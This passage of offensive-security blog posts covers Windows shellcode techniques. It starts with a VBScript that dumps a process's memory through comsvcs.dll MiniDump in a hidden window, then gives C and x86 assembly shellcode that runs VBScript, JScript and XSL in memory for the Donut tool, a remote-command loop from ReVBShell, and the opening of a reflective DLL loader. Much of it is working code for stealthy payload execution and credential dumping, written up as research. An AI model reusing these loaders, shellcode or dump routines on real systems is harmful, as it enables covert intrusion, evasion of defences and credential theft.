    Set fso  = CreateObject("Scripting.FileSystemObject")
    Set svc  = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}")
    
    ' if not a number
    If(Not IsNumeric(pid)) Then
      query = "Name"
    Else
      query = "ProcessId"
    End If
    
    ' try find it
    Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
      query & " = '" & pid & "'")
    
    If (list.Count = 0) Then
      WScript.StdOut.WriteLine("Can't find active process : " & pid)
      WScript.Quit()
    End If

    For Each proc in list
      pid = proc.ProcessId
      str = proc.Name
      Exit For
    Next

    dmp = fso.GetBaseName(str) & ".bin"
    
    ' if dump file already exists, try to remove it
    If(fso.FileExists(dmp)) Then
      WScript.StdOut.WriteLine("Removing " & dmp)
      fso.DeleteFile(dmp)
    End If
    
    WScript.StdOut.WriteLine("Attempting to dump memory from " & _
      str & ":" & pid & " to " & dmp)
    
    Set proc       = svc.Get("Win32_Process")
    Set startup    = svc.Get("Win32_ProcessStartup")
    Set cfg        = startup.SpawnInstance_
    cfg.ShowWindow = SW_HIDE

    cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
          pid & " " & fso.GetAbsolutePathName(".") & "\" & _
          dmp & " full"
    
    Call proc.Create (cmd, null, cfg, pid)
    
    ' sleep for a second
    Wscript.Sleep(1000)
    
    If(fso.FileExists(dmp)) Then
      WScript.StdOut.WriteLine("Memory saved to " & dmp)
    Else
      WScript.StdOut.WriteLine("Something went wrong.")
    End If
End If

Run from elevated cmd prompt.

No idea how useful this could be, but since it’s part of the operating system, it’s probably worth knowing anyway. Perhaps you will find similar functions in signed binaries that perform memory dumping of a target process. 🙂

Posted in windows | Tagged , , , | Leave a comment

Shellcode: In-Memory Execution of JavaScript, VBScript, JScript and XSL

Introduction

A DynaCall() Function for Win32 was published in the August 1998 edition of Dr.Dobbs Journal. The author, Ton Plooy, provided a function in C that allows an interpreted language such as VBScript to call external DLL functions via a registered COM object. An Automation Object for Dynamic DLL Calls published in November 1998 by Jeff Stong built upon this work to provide a more complete project which he called DynamicWrapper. In 2011, Blair Strang wrote a tool called vbsmem that used DynamicWrapper to execute shellcode from VBScript. DynamicWrapper was the source of inspiration for another tool called DynamicWrapperX that appeared in 2008 and it too was used to execute shellcode from VBScript by Casey Smith.

The May 2019 update of Defender Application Control included a number of new policies, one of which is “COM object registration”. Microsoft states the purpose of this policy is to enforce “a built-in allow list of COM object registrations to reduce the risk introduced from certain powerful COM objects.” Are they referring to DynamicWrapper? Possibly, but what about unregistered COM objects? Robert Freeman/IBM demonstrated in 2007 that unregistered COM objects may be useful for obfuscation purposes. His Virus Bulletin presentation Novel code obfuscation with COM doesn’t provide any proof-of-concept code, but does demonstrate the potential to misuse the IActiveScript interface for Dynamic DLL calls without COM registration.

Windows Script Host (WSH)

WSH is an automation technology available since Windows 95 that was popular among developers prior to the release of the .NET Framework in 2002. It was primarily used for generation of dynamic content like Active Server Pages (ASP) written in JScript or VBScript. As .NET superseded this technology, much of the wisdom developers acquired about Active Scripting up until 2002 slowly disappeared from the internet. One post that was recommended quite frequently on developer forums is the Active X FAQ by Mark Baker, which answers most questions developers have about the IActiveScript interface.

Enumerating Script Engines

Can be performed in at least two ways.

  1. Each Class Identifier in HKEY_CLASSES_ROOT\CLSID\ that contains a subkey called OLEScript can be used with Windows Script Hosting.
  2. The Component Categories Manager can enumerate CLSID for category identifiers CATID_ActiveScript or CATID_ActiveScriptParse.

Below is a snippet of code for displaying active script engines using the second approach. See full version here.

void DisplayScriptEngines(void) {
    ICatInformation *pci = NULL;
    IEnumCLSID      *pec = NULL;
    HRESULT         hr;
    CLSID           clsid;
    OLECHAR         *progID, *idStr, path[MAX_PATH], desc[MAX_PATH];
  
    // initialize COM
    CoInitialize(NULL);
    
    // obtain component category manager for this machine
    hr = CoCreateInstance(
      CLSID_StdComponentCategoriesMgr, 
      0, CLSCTX_SERVER, IID_ICatInformation, 
      (void**)&pci);
      
    if(hr == S_OK) {
      // obtain list of script engine parsers
      hr = pci->EnumClassesOfCategories(
        1, &CATID_ActiveScriptParse, 0, 0, &pec);
      
      if(hr == S_OK) {
        // print each CLSID and Program ID
        for(;;) {
          ZeroMemory(path, ARRAYSIZE(path));
          ZeroMemory(desc, ARRAYSIZE(desc));
          
          hr = pec->Next(1, &clsid, 0);
          if(hr != S_OK) {
            break;
          }
          ProgIDFromCLSID(clsid, &progID);
          StringFromCLSID(clsid, &idStr);
          GetProgIDInfo(idStr, path, desc);
          
          wprintf(L"\n*************************************\n");
          wprintf(L"Description : %s\n", desc);
          wprintf(L"CLSID       : %s\n", idStr);
          wprintf(L"Program ID  : %s\n", progID);
          wprintf(L"Path of DLL : %s\n", path);
          
          CoTaskMemFree(progID);
          CoTaskMemFree(idStr);
        }
        pec->Release();
      }
      pci->Release();
    }
}

The output of this code on a system with ActivePerl and ActivePython installed :

*************************************
Description : JScript Language
CLSID       : {16D51579-A30B-4C8B-A276-0FF4DC41E755}
Program ID  : JScript
Path of DLL : C:\Windows\System32\jscript9.dll

*************************************
Description : XML Script Engine
CLSID       : {989D1DC0-B162-11D1-B6EC-D27DDCF9A923}
Program ID  : XML
Path of DLL : C:\Windows\System32\msxml3.dll

*************************************
Description : VB Script Language
CLSID       : {B54F3741-5B07-11CF-A4B0-00AA004A55E8}
Program ID  : VBScript
Path of DLL : C:\Windows\System32\vbscript.dll

*************************************
Description : VBScript Language Encoding
CLSID       : {B54F3743-5B07-11CF-A4B0-00AA004A55E8}
Program ID  : VBScript.Encode
Path of DLL : C:\Windows\System32\vbscript.dll

*************************************
Description : JScript Compact Profile (ECMA 327)
CLSID       : {CC5BBEC3-DB4A-4BED-828D-08D78EE3E1ED}
Program ID  : JScript.Compact
Path of DLL : C:\Windows\System32\jscript.dll

*************************************
Description : Python ActiveX Scripting Engine
CLSID       : {DF630910-1C1D-11D0-AE36-8C0F5E000000}
Program ID  : Python.AXScript.2
Path of DLL : pythoncom36.dll

*************************************
Description : JScript Language
CLSID       : {F414C260-6AC0-11CF-B6D1-00AA00BBBB58}
Program ID  : JScript
Path of DLL : C:\Windows\System32\jscript.dll

*************************************
Description : JScript Language Encoding
CLSID       : {F414C262-6AC0-11CF-B6D1-00AA00BBBB58}
Program ID  : JScript.Encode
Path of DLL : C:\Windows\System32\jscript.dll

*************************************
Description : PerlScript Language
CLSID       : {F8D77580-0F09-11D0-AA61-3C284E000000}
Program ID  : PerlScript
Path of DLL : C:\Perl64\bin\PerlSE.dll

The PerlScript and Python scripting engines are provided by ActiveState. I would recommend using {16D51579-A30B-4C8B-A276-0FF4DC41E755} for JavaScript.

C Implementation of IActiveScript

During research into IActiveScript, I found COM in plain C, part 6 by Jeff Glatt to be helpful. The following code is the bare minimum required to execute VBS/JS files and does not support WSH objects. See here for the full source.

VOID run_script(PWCHAR lang, PCHAR script) {
    IActiveScriptParse     *parser;
    IActiveScript          *engine;
    MyIActiveScriptSite    mas;
    IActiveScriptSiteVtbl  vft;
    LPVOID                 cs;
    DWORD                  len;
    CLSID                  langId;
    HRESULT                hr;
    
    // 1. Initialize IActiveScript based on language
    CLSIDFromProgID(lang, &langId);
    CoInitializeEx(NULL, COINIT_MULTITHREADED);
    
    CoCreateInstance(
      &langId, 0, CLSCTX_INPROC_SERVER, 
      &IID_IActiveScript, (void **)&engine);
    
    // 2. Query engine for script parser and initialize
    engine->lpVtbl->QueryInterface(
        engine, &IID_IActiveScriptParse, 
        (void **)&parser);
        
    parser->lpVtbl->InitNew(parser);
    
    // 3. Initialize IActiveScriptSite interface
    vft.QueryInterface      = (LPVOID)QueryInterface;
    vft.AddRef              = (LPVOID)AddRef;
    vft.Release             = (LPVOID)Release;
    vft.GetLCID             = (LPVOID)GetLCID;
    vft.GetItemInfo         = (LPVOID)GetItemInfo;
    vft.GetDocVersionString = (LPVOID)GetDocVersionString;
    vft.OnScriptTerminate   = (LPVOID)OnScriptTerminate;
    vft.OnStateChange       = (LPVOID)OnStateChange;
    vft.OnScriptError       = (LPVOID)OnScriptError;
    vft.OnEnterScript       = (LPVOID)OnEnterScript;
    vft.OnLeaveScript       = (LPVOID)OnLeaveScript;
    
    mas.site.lpVtbl     = (IActiveScriptSiteVtbl*)&vft;
    mas.siteWnd.lpVtbl  = NULL;
    mas.m_cRef          = 0;
    
    engine->lpVtbl->SetScriptSite(
        engine, (IActiveScriptSite *)&mas);
        
    // 4. Convert script to unicode and execute
    len = MultiByteToWideChar(
      CP_ACP, 0, script, -1, NULL, 0);
    
    len *= sizeof(WCHAR);
    
    cs = malloc(len);
    
    len = MultiByteToWideChar(
      CP_ACP, 0, script, -1, cs, len);
    
    parser->lpVtbl->ParseScriptText(
         parser, cs, 0, 0, 0, 0, 0, 0, 0, 0);  
    
    engine->lpVtbl->SetScriptState(
         engine, SCRIPTSTATE_CONNECTED);
    
    // 5. cleanup
    parser->lpVtbl->Release(parser);
    engine->lpVtbl->Close(engine);
    engine->lpVtbl->Release(engine);
    free(cs);
}

x86 Assembly

Just for illustration, here’s something similar in x86 assembly with some limitations imposed: The script should not exceed 64KB, the UTF-16 conversion only works with ANSI(latin alphabet) characters, and the language (VBS or JS) must be predefined before assembling. When declaring a local variable on the stack that exceeds 4KB, compilers such as GCC and MSVC insert code to perform stack probing which allows the kernel to expand the amount of stack memory available to a thread. There are of course compiler/linker switches to increase the reserved size if you wanted to prevent stack probing, but they are rarely used in practice. Each thread on Windows initially has 16KB of stack available by default as you can see by subtracting the value of StackLimit from StackBase found in the Thread Environment Block (TEB).

0:004> !teb
TEB at 000000f4018bf000
    ExceptionList:        0000000000000000
    StackBase:            000000f401c00000
    StackLimit:           000000f401bfc000
    SubSystemTib:         0000000000000000
    FiberData:            0000000000001e00
    ArbitraryUserPointer: 0000000000000000
    Self:                 000000f4018bf000
    EnvironmentPointer:   0000000000000000
    ClientId:             0000000000001940 . 000000000000067c
    RpcHandle:            0000000000000000
    Tls Storage:          0000000000000000
    PEB Address:          000000f40185a000
    LastErrorValue:       0
    LastStatusValue:      0
    Count Owned Locks:    0
    HardErrorMode:        0
    
0:004> ? 000000f401c00000 - 000000f401bfc000 
Evaluate expression: 16384 = 00000000`00004000

The assembly code initially used VirtualAlloc to allocate enough space, but since this code is unlikely to be used for anything practical, the stack is used instead.

; In-Memory execution of VBScript/JScript using 392 bytes of x86 assembly
; Odzhan

      %include "ax.inc"
      
      %define VBS
      
      bits   32
      
      %ifndef BIN
        global run_scriptx
        global _run_scriptx
      %endif
      
run_scriptx:
_run_scriptx:
      pop    ecx             ; ecx = return address
      pop    eax             ; eax = script parameter
      push   ecx             ; save return address
      cdq                    ; edx = 0
      ; allocate 128KB of stack.
      push   32              ; ecx = 32
      pop    ecx
      mov    dh, 16          ; edx = 4096
      pushad                 ; save all registers
      xchg   eax, esi        ; esi = script
alloc_mem:
      sub    esp, edx        ; subtract size of page
      test   [esp], esp      ; stack probe
      loop   alloc_mem       ; continue for 32 pages
      mov    edi, esp        ; edi = memory
      xor    eax, eax
utf8_to_utf16:               ; YMMV. Prone to a stack overflow.
      cmp    byte[esi], al   ; ? [esi] == 0
      movsb                  ; [edi] = [esi], edi++, esi++
      stosb                  ; [edi] = 0, edi++
      jnz    utf8_to_utf16   ;
      stosd                  ; store 4 nulls at end      
      and    edi, -4         ; align by 4 bytes
      call   init_api        ; load address of invoke_api onto stack
      ; *******************************
      ; INPUT: eax contains hash of API
      ; Assumes DLL already loaded
      ; No support for resolving by ordinal or forward references
      ; *******************************
invoke_api:
      pushad
      push   TEB.ProcessEnvironmentBlock
      pop    ecx
      mov    eax, [fs:ecx]
      mov    eax, [eax+PEB.Ldr]
      mov    edi, [eax+PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink]
      jmp    get_dll
next_dll:    
      mov    edi, [edi+LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink]
get_dll:
      mov    ebx, [edi+LDR_DATA_TABLE_ENTRY.DllBase]
      mov    eax, [ebx+IMAGE_DOS_HEADER.e_lfanew]
      ; ecx = IMAGE_DATA_DIRECTORY[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
      mov    ecx, [ebx+eax+IMAGE_NT_HEADERS.OptionalHeader + \
                           IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                           IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
                           IMAGE_DATA_DIRECTORY.VirtualAddress]
      jecxz  next_dll
      ; esi = offset IMAGE_EXPORT_DIRECTORY.NumberOfNames 
      lea    esi, [ebx+ecx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
      lodsd
      xchg   eax, ecx
      jecxz  next_dll        ; skip if no names
      ; ebp = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
      lodsd
      add    eax, ebx        ; ebp = RVA2VA(eax, ebx)
      xchg   eax, ebp        ;
      ; edx = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      lodsd
      add    eax, ebx        ; edx = RVA2VA(eax, ebx)
      xchg   eax, edx        ;
      ; esi = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals      
      lodsd
      add    eax, ebx        ; esi = RVA2VA(eax, ebx)
      xchg   eax, esi
get_name:
      pushad
      mov    esi, [edx+ecx*4-4] ; esi = AddressOfNames[ecx-1]
      add    esi, ebx           ; esi = RVA2VA(esi, ebx)
      xor    eax, eax           ; eax = 0
      cdq                       ; h = 0
hash_name:    
      lodsb
      add    edx, eax
      ror    edx, 8
      dec    eax
      jns    hash_name
      cmp    edx, [esp + _eax + pushad_t_size]   ; hashes match?
      popad
      loopne get_name              ; --ecx && edx != hash
      jne    next_dll              ; get next DLL        
      movzx  eax, word [esi+ecx*2] ; eax = AddressOfNameOrdinals[ecx]
      add    ebx, [ebp+eax*4]      ; ecx = base + AddressOfFunctions[eax]
      mov    [esp+_eax], ebx
      popad                        ; restore all
      jmp    eax
_ds_section:
      ; ---------------------
      db     "ole32", 0, 0, 0
co_init:
      db     "CoInitializeEx", 0
co_init_len equ $-co_init
co_create:
      db     "CoCreateInstance", 0
co_create_len equ $-co_create
      ; IID_IActiveScript
      ; IID_IActiveScriptParse32 +1
      dd     0xbb1a2ae1
      dw     0xa4f9, 0x11cf
      db     0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64
  %ifdef VBS
      ; CLSID_VBScript
      dd     0xB54F3741
      dw     0x5B07, 0x11cf
      db     0xA4, 0xB0, 0x00, 0xAA, 0x00, 0x4A, 0x55, 0xE8
  %else
      ; CLSID_JScript
      dd     0xF414C260
      dw     0x6AC0, 0x11CF
      db     0xB6, 0xD1, 0x00, 0xAA, 0x00, 0xBB, 0xBB, 0x58
  %endif
_QueryInterface:
      mov    eax, E_NOTIMPL     ; return E_NOTIMPL
      retn   3*4
_AddRef:
_Release:
      pop    eax                ; return S_OK
      push   eax
      push   eax
_GetLCID:
_GetItemInfo:
_GetDocVersionString:
      pop    eax                ; return S_OK
      push   eax
      push   eax
_OnScriptTerminate:
      xor    eax, eax           ; return S_OK
      retn   3*4
_OnStateChange:
_OnScriptError:
      jmp    _GetDocVersionString
_OnEnterScript:
_OnLeaveScript:
      jmp    _Release
init_api:
      pop    ebp
      lea    esi, [ebp + (_ds_section - invoke_api)] 
      
      ; LoadLibrary("ole32");
      push   esi                    ; "ole32", 0
      mov    eax, 0xFA183D4A        ; eax = hash("LoadLibraryA")
      call   ebp                    ; invoke_api(eax)
      xchg   ebx, eax               ; ebp = base of ole32
      lodsd                         ; skip "ole32"
      lodsd
      
      ; _CoInitializeEx = GetProcAddress(ole32, "CoInitializeEx");
      mov    eax, 0x4AAC90F7        ; eax = hash("GetProcAddress")
      push   eax                    ; save eax/hash
      push   esi                    ; esi = "CoInitializeEx"
      push   ebx                    ; base of ole32
      call   ebp                    ; invoke_api(eax)

      ; 1. _CoInitializeEx(NULL, COINIT_MULTITHREADED);
      cdq                           ; edx = 0
      push   edx                    ; COINIT_MULTITHREADED
      push   edx                    ; NULL
      call   eax                    ; CoInitializeEx
      
      add    esi, co_init_len       ; skip "CoInitializeEx", 0
      
      ; _CoCreateInstance = GetProcAddress(ole32, "CoCreateInstance");
      pop    eax                    ; eax = hash("GetProcAddress")
      push   esi                    ; "CoCreateInstance"
      push   ebx                    ; base of ole32
      call   ebp                    ; invoke_api

      add    esi, co_create_len     ; skip "CoCreateInstance", 0
      
      ; 2. _CoCreateInstance(
          ; &langId, 0, CLSCTX_INPROC_SERVER, 
          ; &IID_IActiveScript, (void **)&engine);
      push   edi                    ; &engine
      scasd                         ; skip engine
      mov    ebx, edi               ; ebx = &parser
      push   edi                    ; &IID_IActiveScript
      movsd
      movsd
      movsd
      movsd
      push   CLSCTX_INPROC_SERVER
      push   0                      ; 
      push   esi                    ; &CLSID_VBScript or &CLSID_JScript
      call   eax                    ; _CoCreateInstance
      
      ; 3. Query engine for script parser
      ; engine->lpVtbl->QueryInterface(
      ;  engine, &IID_IActiveScriptParse, 
      ;  (void **)&parser);
      push   edi                    ; &parser
      push   ebx                    ; &IID_IActiveScriptParse32
      inc    dword[ebx]             ; add 1 for IActiveScriptParse32
      mov    esi, [ebx-4]           ; esi = engine
      push   esi                    ; engine
      mov    eax, [esi]             ; eax = engine->lpVtbl
      call   dword[eax + IUnknownVtbl.QueryInterface]
      
      ; 4. Initialize parser    
      ; parser->lpVtbl->InitNew(parser);
      mov    ebx, [edi]             ; ebx = parser
      push   ebx                    ; parser
      mov    eax, [ebx]             ; eax = parser->lpVtbl
      call   dword[eax + IActiveScriptParse32Vtbl.InitNew]
      
      ; 5. Initialize IActiveScriptSite
      lea    eax, [ebp + (_QueryInterface - invoke_api)]
      push   edi                    ; save pointer to IActiveScriptSiteVtbl
      stosd                         ; vft.QueryInterface      = (LPVOID)QueryInterface;
      add    eax, _AddRef  - _QueryInterface
      stosd                         ; vft.AddRef              = (LPVOID)AddRef;
      stosd                         ; vft.Release             = (LPVOID)Release;
      add    eax, _GetLCID - _Release
      stosd                         ; vft.GetLCID             = (LPVOID)GetLCID;
      stosd                         ; vft.GetItemInfo         = (LPVOID)GetItemInfo;
      stosd                         ; vft.GetDocVersionString = (LPVOID)GetDocVersionString;
      add    eax, _OnScriptTerminate - _GetDocVersionString
      stosd                         ; vft.OnScriptTerminate   = (LPVOID)OnScriptTerminate;
      add    eax, _OnStateChange - _OnScriptTerminate
      stosd                         ; vft.OnStateChange       = (LPVOID)OnStateChange;
      stosd                         ; vft.OnScriptError       = (LPVOID)OnScriptError;
      inc    eax
      inc    eax
      stosd                         ; vft.OnEnterScript       = (LPVOID)OnEnterScript;
      stosd                         ; vft.OnLeaveScript       = (LPVOID)OnLeaveScript;
      pop    eax                    ; eax = &vft
      
      ; 6. Set script site 
      ; engine->lpVtbl->SetScriptSite(
      ;   engine, (IActiveScriptSite *)&mas);
      push    edi                   ; &IMyActiveScriptSite
      stosd                         ; IActiveScriptSite.lpVtbl = &vft
      xor     eax, eax
      stosd                         ; IActiveScriptSiteWindow.lpVtbl = NULL
      push    esi                   ; engine
      mov     eax, [esi]
      call    dword[eax + IActiveScriptVtbl.SetScriptSite]

      ; 7. Parse our script
      ; parser->lpVtbl->ParseScriptText(
      ;     parser, cs, 0, 0, 0, 0, 0, 0, 0, 0);
      mov    edx, esp
      push   8
      pop    ecx
init_parse:
      push   eax                    ; 0
      loop   init_parse
      push   edx                    ; script
      push   ebx                    ; parser
      mov    eax, [ebx]
      call   dword[eax + IActiveScriptParse32Vtbl.ParseScriptText]
      
      ; 8. Run script
      ; engine->lpVtbl->SetScriptState(
      ;     engine, SCRIPTSTATE_CONNECTED);
      push   SCRIPTSTATE_CONNECTED
      push   esi
      mov    eax, [esi]
      call   dword[eax + IActiveScriptVtbl.SetScriptState]
      
      ; 9. cleanup
      ; parser->lpVtbl->Release(parser);
      push   ebx
      mov    eax, [ebx]
      call   dword[eax + IUnknownVtbl.Release]
      
      ; engine->lpVtbl->Close(engine);
      push   esi                    ; engine
      push   esi                    ; engine
      lodsd                         ; eax = lpVtbl
      xchg   eax, edi
      call   dword[edi + IActiveScriptVtbl.Close]
      ; engine->lpVtbl->Release(engine);
      call   dword[edi + IUnknownVtbl.Release]
     
      inc    eax                    ; eax = 4096 * 32
      shl    eax, 17
      add    esp, eax
      popad
      ret
      

Windows Script Host Objects

Two named objects (WSH and WScript) are added to the script namespace by wscript.exe/cscript.exe that do not require instantiating at runtime. The ‘WScript’ object is used primarily for console I/O, accessing arguments and the path of script on disk. It can also be used to terminate a script via the Quit method or poll operations via the Sleep method. The IActiveScript interface only provides basic scripting functionality, so if we want our host to support those objects, or indeed any custom objects, they must be implemented manually. Consider the following code taken from ReVBShell that expects to run inside WSH.

  While True
    ' receive command from remote HTTP server
    ' other code omitted
    Select Case strCommand
      Case "KILL"
        SendStatusUpdate strRawCommand, "Goodbye!"
        WScript.Quit 0
    End Select
  Wend

When this was used for testing Donut shellcode, the script engine stopped running upon reaching the line “WScript.Quit 0” because it didn’t recognize the WScript object. “On Error Resume Next” was enabled, and so the script simply kept executing. Once the name of this object was added to the namespace via IActiveScript::AddNamedItem, a request for ITypeInfo and IUnknown interfaces was made via IActiveScriptSite::GetItemInfo. If we don’t provide an interface for the request, the parser calls IActiveScriptSite::OnScriptError with the message “Variable is undefined ‘WScript'” before terminating.

To enable support for ‘WScript’ requires a custom implementation of the WScript interface defined in type information found in wscript.exe/cscript.exe. First, add the name of the object to the scripting engine’s namespace using AddNamedItem. This makes any methods, properties and events part of this object visible to the script.

obj = SysAllocString(L"WScript");
engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE);

Obtain the type information from wscript.exe or cscript.exe. IID_IHost is simply the class identifier retrieved from aforementioned EXE files. Below is a screenshot of OleWoo, but other TLB viewers may work just as well.

ITypeLib  lpTypeLib;
ITypeInfo lpTypeInfo;

LoadTypeLib(L"WScript.exe", &lpTypeLib);
lpTypeLib->lpVtbl->GetTypeInfoOfGuid(lpTypeLib, &IID_IHost, &lpTypeInfo);

Now, when the scripting engine first encounters the ‘WScript’ object and requests an IUnknown interface via IActiveScriptSite::GetItemInfo, Donut returns a pointer to a minimal implementation of the IHost interface.

After this, the IDispatch::Invoke method will be used to call the ‘Quit’ method requested by the script. At the moment, Donut only implements Quit and Sleep methods, but others can be supported if requested.

Extensible Stylesheet Language Transformations (XSLT)

XSL files can contain interpreted languages like JScript/VBScript. The following code found here is based on this example by TheWover.

void run_xml_script(const char *path) {
    IXMLDOMDocument *pDoc; 
    IXMLDOMNode     *pNode;
    HRESULT         hr;
    PWCHAR          xml_str;
    VARIANT_BOOL    loaded;
    BSTR            res;
    
    xml_str = read_script(path);
    
    if(xml_str == NULL) return;
    
    // 1. Initialize COM
    hr = CoInitialize(NULL);
    if(hr == S_OK) {
      // 2. Instantiate XMLDOMDocument object
      hr = CoCreateInstance(
        &CLSID_DOMDocument30, 
        NULL, CLSCTX_INPROC_SERVER,
        &IID_IXMLDOMDocument, 
        (void**)&pDoc);
        
      if(hr == S_OK) {
        // 3. load XML file
        hr = pDoc->lpVtbl->loadXML(pDoc, xml_str, &loaded);
        if(hr == S_OK) {
          // 4. create node interface
          hr = pDoc->lpVtbl->QueryInterface(
            pDoc, &IID_IXMLDOMNode, (void **)&pNode);
            
          if(hr == S_OK) {
            // 5. execute script
            hr = pDoc->lpVtbl->transformNode(pDoc, pNode, &res);
            pNode->lpVtbl->Release(pNode);
          }
        }
        pDoc->lpVtbl->Release(pDoc);
      }
      CoUninitialize();
    }
    free(xml_str);
}

PC-Relative Addressing in C

The linker makes an assumption about where a PE file will be loaded in memory. Most EXE files request an image base address of 0x00400000 for 32-bit or 0x0000000140000000 for 64-bit. If the PE loader can’t map at the requested address, it uses relocation information to fix position-dependent code and data. ARM has support for PC-relative addressing via the ADR, ADRP and LDR opcodes, but poor old x86 lacks a similar instruction. x64 does support RIP-relative addressing, but there’s no guarantee a compiler will use it even if we tell it to (-fPIC and -fPIE for GCC). Because we’re using C for the shellcode, we need to manually calculate the address of a function relative to where the shellcode resides in memory. We could apply relocations in the same way a PE loader does, but self-modifying code can trigger some anti-malware programs. Instead, the program counter (EIP on x86 or RIP on x64) is read using some assembly and this is used to calculate the virtual address of a function in-memory. The following code stub is placed at the end of the payload and returns the value of the program counter.

#if defined(_MSC_VER) 
  #if defined(_M_X64)

    #define PC_CODE_SIZE 9 // sub rsp, 40 / call get_pc

    static char *get_pc_stub(void) {
      return (char*)_ReturnAddress() - PC_CODE_SIZE;
    }
    
    static char *get_pc(void) {
      return get_pc_stub();
    }

  #elif defined(_M_IX86)
    __declspec(naked) static char *get_pc(void) {
      __asm {
          call   pc_addr
        pc_addr:
          pop    eax
          sub    eax, 5
          ret
      }
    }
  #endif  
#elif defined(__GNUC__) 
  #if defined(__x86_64__)
    static char *get_pc(void) {
        __asm__ (
        "call   pc_addr\n"
      "pc_addr:\n"
        "pop    %rax\n"
        "sub    $5, %rax\n"
        "ret");
    }
  #elif defined(__i386__)
    static char *get_pc(void) {
        __asm__ (
        "call   pc_addr\n"
      "pc_addr:\n"
        "popl   %eax\n"
        "subl   $5, %eax\n"
        "ret");
    }
  #endif
#endif

With this code, the linker will calculate the Relative Virtual Address (RVA) by subtracting the offset of our target function from the offset of the get_pc() function. Then at runtime, it will subtract the RVA from the program counter returned by get_pc() to obtain the Virtual Address of the target function. The position of get_pc() must be placed at the end of a payload, otherwise this would not work. The following macro (named after the ARM opcode ADR) is used to calculate the virtual address of a function in-memory.

#define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr))

To illustrate how it’s used, the following code from the payload shows how to initialize the IActiveScriptSite interface.

// initialize virtual function table
static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) {
    MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
    
    // Initialize IUnknown
    mas->site.lpVtbl->QueryInterface      = ADR(LPVOID, ActiveScript_QueryInterface);
    mas->site.lpVtbl->AddRef              = ADR(LPVOID, ActiveScript_AddRef);
    mas->site.lpVtbl->Release             = ADR(LPVOID, ActiveScript_Release);
    
    // Initialize IActiveScriptSite
    mas->site.lpVtbl->GetLCID             = ADR(LPVOID, ActiveScript_GetLCID);
    mas->site.lpVtbl->GetItemInfo         = ADR(LPVOID, ActiveScript_GetItemInfo);
    mas->site.lpVtbl->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString);
    mas->site.lpVtbl->OnScriptTerminate   = ADR(LPVOID, ActiveScript_OnScriptTerminate);
    mas->site.lpVtbl->OnStateChange       = ADR(LPVOID, ActiveScript_OnStateChange);
    mas->site.lpVtbl->OnScriptError       = ADR(LPVOID, ActiveScript_OnScriptError);
    mas->site.lpVtbl->OnEnterScript       = ADR(LPVOID, ActiveScript_OnEnterScript);
    mas->site.lpVtbl->OnLeaveScript       = ADR(LPVOID, ActiveScript_OnLeaveScript);
    
    mas->site.m_cRef                      = 0;
    mas->inst                             = inst;
}

Dynamic Calls to DLL Functions

After implementing support for some WScript methods, providing access to DLL functions directly from VBScript/JScript using a similar approach is much easier to understand. The initial problem is how to load type information directly from memory. One solution to this can be found in A lightweight approach for exposing C++ objects to a hosted Active Scripting engine. Confronted with the same problem, the author uses CreateDispTypeInfo and CreateStdDispatch to create the ITypeInfo and IDispatch interfaces necessary for interpreted languages to call C++ objects. The same approach can be used to call DLL functions and doesn’t require COM registration.

Summary

v0.9.2 of Donut will support in-memory execution of JScript/VBScript and XSL files. Dynamic calls to DLL functions without COM registration will be supported in a future release.

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , , , | Leave a comment

Shellcode: In-Memory Execution of DLL

Introduction

In March 2002, the infamous group 29A published their sixth e-zine. One of the articles titled In-Memory PE EXE Execution by Z0MBiE demonstrated how to manually load and run a Portable Executable entirely from memory. The InMem client provided as a PoC downloads a PE from a remote TFTP server into memory and after some basic preparation executes the entrypoint. Of course, running console and GUI applications from memory isn’t that straightforward because Microsoft Windows consists of subsystems. Try manually executing a console application from inside a GUI subsystem without using NtCreateProcess and it will probably cause an unhandled exception crashing the host process. Unless designed for a specific subsystem, running a DLL from memory is relatively error-free and simple to implement, so this post illustrates just that with C and x86 assembly.

Proof of Concept

Z0MBiE didn’t seem to perform any other research beyond a PoC, however, Y0da did write a tool called InConEx that was published in 29A#7 ca. 2004. Since then, various other implementations have been published, but they all seem to be derived in one form or another from the original PoC and use the following steps.

  1. Allocate RWX memory for size of image. (VirtualAlloc)
  2. Copy each section to RWX memory.
  3. Initialize the import table. (LoadLibrary/GetProcAddress)
  4. Apply relocations.
  5. Execute entry point.

Today, some basic loaders will also handle resources and TLS callbacks. The following is example in C based on Z0MBiE’s article.

typedef struct _IMAGE_RELOC {
    WORD offset :12;
    WORD type   :4;
} IMAGE_RELOC, *PIMAGE_RELOC;

typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
typedef VOID (WINAPI *entry_exe)(VOID);

VOID load_dllx(LPVOID base);

VOID load_dll(LPVOID base) {
    PIMAGE_DOS_HEADER        dos;
    PIMAGE_NT_HEADERS        nt;
    PIMAGE_SECTION_HEADER    sh;
    PIMAGE_THUNK_DATA        oft, ft;
    PIMAGE_IMPORT_BY_NAME    ibn;
    PIMAGE_IMPORT_DESCRIPTOR imp;
    PIMAGE_RELOC             list;
    PIMAGE_BASE_RELOCATION   ibr;
    DWORD                    rva;
    PBYTE                    ofs;
    PCHAR                    name;
    HMODULE                  dll;
    ULONG_PTR                ptr;
    DllMain_t                DllMain;
    LPVOID                   cs;
    DWORD                    i, cnt;
    
    dos = (PIMAGE_DOS_HEADER)base;
